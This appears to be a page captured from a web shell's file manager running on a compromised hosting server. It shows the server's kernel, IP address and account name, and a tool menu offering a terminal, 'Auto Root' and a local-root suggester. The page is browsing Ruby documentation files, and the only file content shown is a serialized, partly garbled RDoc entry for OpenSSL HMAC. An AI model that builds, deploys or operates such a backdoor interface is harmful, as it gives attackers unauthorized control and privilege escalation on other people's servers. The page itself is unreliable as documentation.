Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
ri /
system /
OpenSSL /
HMAC /
Delete
Unzip
Name
Size
Permission
Date
Action
%3c%3c-i.ri
827
B
-rw-r--r--
2026-04-07 16:51
%3d%3d-i.ri
345
B
-rw-r--r--
2026-04-07 16:51
base64digest-c.ri
903
B
-rw-r--r--
2026-04-07 16:51
base64digest-i.ri
392
B
-rw-r--r--
2026-04-07 16:51
cdesc-HMAC.ri
1.76
KB
-rw-r--r--
2026-04-07 16:51
digest-c.ri
909
B
-rw-r--r--
2026-04-07 16:51
digest-i.ri
701
B
-rw-r--r--
2026-04-07 16:51
hexdigest-c.ri
900
B
-rw-r--r--
2026-04-07 16:51
hexdigest-i.ri
1.01
KB
-rw-r--r--
2026-04-07 16:51
initialize_copy-i.ri
261
B
-rw-r--r--
2026-04-07 16:51
inspect-i.ri
893
B
-rw-r--r--
2026-04-07 16:51
new-c.ri
1.19
KB
-rw-r--r--
2026-04-07 16:51
reset-i.ri
853
B
-rw-r--r--
2026-04-07 16:51
to_s-i.ri
887
B
-rw-r--r--
2026-04-07 16:51
update-i.ri
847
B
-rw-r--r--
2026-04-07 16:51
Save
Rename
U:RDoc::AnyMethod[iI"base64digest:ETI" OpenSSL::HMAC::base64digest;TT:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"NReturns the authentication code as a Base64-encoded string. The _digest_ ;TI"Kparameter specifies the digest algorithm to use. This may be a String ;TI"Grepresenting the algorithm name or an instance of OpenSSL::Digest.;To:RDoc::Markup::BlankLine S:RDoc::Markup::Heading: leveli: textI"Example;To:RDoc::Markup::Verbatim; [ I"key = 'key' ;TI":data = 'The quick brown fox jumps over the lazy dog' ;TI" ;TI":hmac = OpenSSL::HMAC.base64digest('SHA1', key, data) ;TI"'#=> "3nybhbi3iqa8ino29wqQcBydtNk=";T:@format0: @fileI"$ext/openssl/lib/openssl/hmac.rb;T:0@omit_headings_from_table_of_contents_below0I"5HMAC.base64digest(digest, key, data) -> aString ;T0[ I"(digest, key, data);T@FI" HMAC;TcRDoc::NormalClass00